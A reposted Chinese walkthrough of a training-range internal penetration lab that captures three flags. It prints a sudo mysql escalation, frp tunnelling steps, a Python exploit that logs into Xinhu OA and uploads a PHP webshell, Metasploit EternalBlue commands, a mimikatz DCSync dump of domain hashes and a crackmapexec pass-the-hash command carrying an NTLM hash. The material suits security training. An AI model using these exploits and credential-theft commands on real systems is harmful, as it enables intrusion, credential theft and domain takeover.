您的位置:首页 > 财经 > 金融 > 【内网渗透】最保姆级的春秋云镜initial打靶笔记

【内网渗透】最保姆级的春秋云镜initial打靶笔记

2024/12/23 3:14:16 来源:https://blog.csdn.net/uuzeray/article/details/141316323  浏览:    关键词:【内网渗透】最保姆级的春秋云镜initial打靶笔记

目录

flag1

flag2

flag3 


flag1

外网thinkphp服务 

随便找个工具梭

连蚁剑

读/root目录要提权

suid没有可利用的提权命令,打sudo提权

sudo -l

mysql的sudo提权 

Linux提权之Sudo 70种提权方法 - 简单安全

 查看文件名带flag的文件

sudo mysql -e '\! find / -type f -name '*flag*' 2>/dev/null'

读文件

sudo mysql -e '\! cat /root/flag/flag01.txt'

拿到第一个flag,提示下一个flag在内网服务器 

flag{60b53231-

flag2

 msf反弹shell

上传fscan扫内网

 https://github.com/shadow1ng/fscan/releases

172.22.1.2   DC域控
172.22.1.21  MS17-010永恒之蓝
172.22.1.18  信呼OA系统

先打信呼0A

frp内网穿透

vps上先起一个frps

./frps -c frps.ini

再在靶机上起一个frpc

先上传或者wget下载frpc和frpc.ini

./frpc -c frpc.ini

本机电脑配一下Proxifier

然后就能直接浏览器里访问内网服务

现成exp梭了 

import requestssession = requests.session()url_pre = 'http://url/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {'rempass': '0','jmpass': 'false','device': '1625884034525','ltype': '0','adminuser': 'dGVzdA::','adminpass': 'YWJjMTIz','yanzm': ''
}r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3)

先给蚁剑配置socks5代理

蚁剑连http://172.22.1.18/upload/2024-08/20_17073585.php拿到flag2

flag02: 2ce3-4813-87d4-

最后提示我们去打DC

flag3 

在打DC前先打172.22.1.21 MS17-010永恒之蓝

这个一般直接拿kali的msf打就行

先给msf所在机配一下socks5代理

vim /etc/proxychains4.conf

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

成功正向连接

永恒之蓝打了之后本身就是SYSTEM权限,可以mimikatz搜集域内用户hash

load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

 

再用crackmapexec打PTH拿下域控

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

 拿到flag3

flag03: e8f88d0d43d6}

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com